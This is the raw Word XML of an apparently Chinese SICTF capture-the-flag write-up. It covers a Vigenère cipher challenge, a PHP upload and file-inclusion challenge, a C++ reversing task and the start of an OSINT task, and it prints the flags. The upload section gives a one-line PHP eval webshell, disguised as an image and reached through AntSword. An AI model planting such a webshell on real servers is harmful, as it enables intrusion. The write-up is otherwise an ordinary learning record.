          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>蚁剑</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00C3244B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="006817F2" w:rsidRPr="000A53AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A47C1" w14:textId="77777777" w:rsidR="0037226A" w:rsidRDefault="0037226A" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D933FE" w14:textId="77777777" w:rsidR="00DB5989" w:rsidRPr="00DB5989" w:rsidRDefault="00DB5989" w:rsidP="00DB5989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DB5989">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>问卷调查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6377E510" w14:textId="17C19F0B" w:rsidR="0037226A" w:rsidRDefault="00022913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会做的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>狠狠差评</w:t>
      </w:r>
      <w:r w:rsidR="00ED5A92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED5A92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bushi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED5A92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="663C865E" w14:textId="77777777" w:rsidR="00D61E1A" w:rsidRDefault="00D61E1A" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DFA270" w14:textId="77777777" w:rsidR="00D61E1A" w:rsidRDefault="00D61E1A" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABEAF13" w14:textId="77777777" w:rsidR="00D61E1A" w:rsidRDefault="00D61E1A" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651A7BC0" w14:textId="77777777" w:rsidR="00D61E1A" w:rsidRPr="00370C5D" w:rsidRDefault="00D61E1A" w:rsidP="00D61E1A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370C5D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00370C5D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
      <w:r w:rsidRPr="00370C5D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370C5D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Vigenere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08BE0388" w14:textId="3749C2B4" w:rsidR="00D61E1A" w:rsidRDefault="00317514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题目提示维基利亚密码</w:t>
      </w:r>
      <w:r w:rsidR="00A94383">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97EFDE" w14:textId="4F6431D3" w:rsidR="00A94383" w:rsidRDefault="00A94383" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94383">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51D858BF" wp14:editId="594E8A4C">
            <wp:extent cx="5274310" cy="2127250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="5540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1651" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId34"/>
                    <a:srcRect t="13405" b="28273"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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965F" w14:textId="71F13CF1" w:rsidR="00095525" w:rsidRDefault="00095525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看就是要这一串</w:t>
      </w:r>
      <w:r w:rsidR="001A29A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A461E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>找了个网站</w:t>
      </w:r>
      <w:r w:rsidR="001A29A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>爆破一下</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00D1609C" w:rsidRPr="00F8263C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="00D1609C" w:rsidRPr="00F8263C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ttps://www.guballa.de/vigenere-solver</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="614C3421" w14:textId="6CEBAF8A" w:rsidR="00D1609C" w:rsidRDefault="00D1609C" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1609C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BA2E28" wp14:editId="18E231BA">
            <wp:extent cx="5274310" cy="5225415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1384939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8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251" w14:textId="7E864334" w:rsidR="00B457A7" w:rsidRDefault="00B457A7" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B457A7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B457A7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4695cab9-fd68-4684-be81-c6c1acb6cafa}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2CA431" w14:textId="77777777" w:rsidR="00E720BF" w:rsidRDefault="00E720BF" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D042702" w14:textId="77777777" w:rsidR="00E720BF" w:rsidRPr="002914E1" w:rsidRDefault="00E720BF" w:rsidP="00E720BF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2914E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="002914E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>％</w:t>
      </w:r>
      <w:r w:rsidRPr="002914E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586A86E" w14:textId="479C2159" w:rsidR="00E720BF" w:rsidRDefault="00532122" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532122">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB81FFC" wp14:editId="58CCB28C">
            <wp:extent cx="5274310" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="2139041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416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BD4" w14:textId="4ACC442C" w:rsidR="0053669C" w:rsidRDefault="0053669C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文件包含</w:t>
      </w:r>
      <w:r w:rsidR="008D4E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5261E7" w14:textId="08FF93E0" w:rsidR="008D4E5B" w:rsidRDefault="008D4E5B" w:rsidP="000A53AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4E5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD8B3F1" wp14:editId="21782D87">
            <wp:extent cx="5274310" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="620272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20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6A63" w14:textId="6B0554FC" w:rsidR="00A45D79" w:rsidRDefault="0095482F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拿到源码，发现过滤的东西很少</w:t>
      </w:r>
      <w:r w:rsidR="004F509E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CA0E48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>本身我想包含index或者</w:t>
      </w:r>
      <w:r w:rsidR="00F5330E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>直接读flag</w:t>
      </w:r>
      <w:r w:rsidR="00D03BFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00536C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>尝试了一下</w:t>
      </w:r>
      <w:r w:rsidR="00E60830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidR="00C231EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，一个是不能自包含，一个是不要直接获取</w:t>
      </w:r>
      <w:r w:rsidR="0040467E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0040467E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>盲猜服务器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0040467E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>代码正则匹配禁止</w:t>
      </w:r>
      <w:r w:rsidR="000169F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>index和flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829BDA3" w14:textId="44DE5B4D" w:rsidR="00A45D79" w:rsidRDefault="00A45D79" w:rsidP="000A53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了源码后面都好办了</w:t>
      </w:r>
      <w:r w:rsidR="00A84E38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，过滤</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001010B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001010B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>….</w:t>
      </w:r>
      <w:r w:rsidR="001010B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001010B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B4143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，还有文件里不能用</w:t>
      </w:r>
      <w:r w:rsidR="00AE007A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00AE007A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE007A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0064144B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB3B47" w14:textId="5805837B" w:rsidR="00944020" w:rsidRPr="00944020" w:rsidRDefault="0064144B" w:rsidP="00944020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944020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>换</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>头：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00944020">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;?=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00944020">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> @eval($_POST['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EEC20" w14:textId="324EC70B" w:rsidR="00944020" w:rsidRDefault="00944020" w:rsidP="00944020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图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3511AF" w14:textId="554B6FF8" w:rsidR="00BA7A5F" w:rsidRPr="008401A3" w:rsidRDefault="00BA7A5F" w:rsidP="008401A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7A5F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A1366E4" wp14:editId="234BA26B">
            <wp:extent cx="5274310" cy="3704590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149762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97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93E4" w14:textId="25758159" w:rsidR="00BA7A5F" w:rsidRDefault="003D02B9" w:rsidP="00944020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包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A0C6A" w14:textId="4C48A58F" w:rsidR="00AD762F" w:rsidRDefault="00AD762F" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD762F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A042D54" wp14:editId="214796F8">
            <wp:extent cx="5274310" cy="946150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="390295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5295" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="48372"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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D684" w14:textId="33CE4D18" w:rsidR="005121E8" w:rsidRDefault="005121E8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蚁剑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连接，结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9EEB1B" w14:textId="4812BB5A" w:rsidR="0012678F" w:rsidRDefault="0012678F" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012678F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11AA38A4" wp14:editId="4A4BA4AC">
            <wp:extent cx="4807197" cy="2044805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12032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5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8D2A" w14:textId="044C26FA" w:rsidR="00E21AFA" w:rsidRDefault="00E21AFA" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21AFA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{8dbc5e53-3e37-416e-8ecd-d99566fe0291}</w:t>
      </w:r>
      <w:r w:rsidR="00F8329A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（赛后复现，可能与原flag不同）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A5EE8" w14:textId="77777777" w:rsidR="00E17FB7" w:rsidRDefault="00E17FB7" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD02658" w14:textId="77777777" w:rsidR="008E5AB7" w:rsidRPr="008E5AB7" w:rsidRDefault="008E5AB7" w:rsidP="008E5AB7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8E5AB7">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5AB7">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5AB7">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E5AB7">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Baby_C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E5AB7">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D36C7" w14:textId="03CB6E82" w:rsidR="00E17FB7" w:rsidRDefault="00415927" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00415927">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E5B369D" wp14:editId="252AC2D8">
            <wp:extent cx="5274310" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="124466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675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225" w14:textId="631B1297" w:rsidR="003318D0" w:rsidRDefault="003318D0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后看到flag，跟进变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC90EB0" w14:textId="4024A371" w:rsidR="00CF0A8E" w:rsidRDefault="00CF0A8E" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0A8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589EF254" wp14:editId="11DFAE0E">
            <wp:extent cx="5274310" cy="992505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10537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84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8458" w14:textId="4091621C" w:rsidR="005C42E7" w:rsidRDefault="00E04C72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取然后十六进制转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C6E863" w14:textId="38FEFB12" w:rsidR="005C42E7" w:rsidRDefault="005C42E7" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C42E7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>53494354467B34653437346238612D396466362D343534622D396561362D6434663565333763643531667D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB8168" w14:textId="7B7003C3" w:rsidR="004D3107" w:rsidRDefault="004D3107" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3107">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="134D3F69" wp14:editId="5058A0F7">
            <wp:extent cx="5274310" cy="1946275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1204224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48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217" w14:textId="0B5BA670" w:rsidR="00057D45" w:rsidRDefault="00057D45" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00057D45">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{4e474b8a-9df6-454b-9ea6-d4f5e37cd51f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D25A04" w14:textId="77777777" w:rsidR="0049383B" w:rsidRDefault="0049383B" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214C5796" w14:textId="77777777" w:rsidR="0049383B" w:rsidRDefault="0049383B" w:rsidP="0049383B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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>]OSINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1399A319" w14:textId="30597DB5" w:rsidR="0049383B" w:rsidRDefault="00D21AB5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随便按按</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7289E4" w14:textId="6136A4CC" w:rsidR="008B4345" w:rsidRDefault="008B4345" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
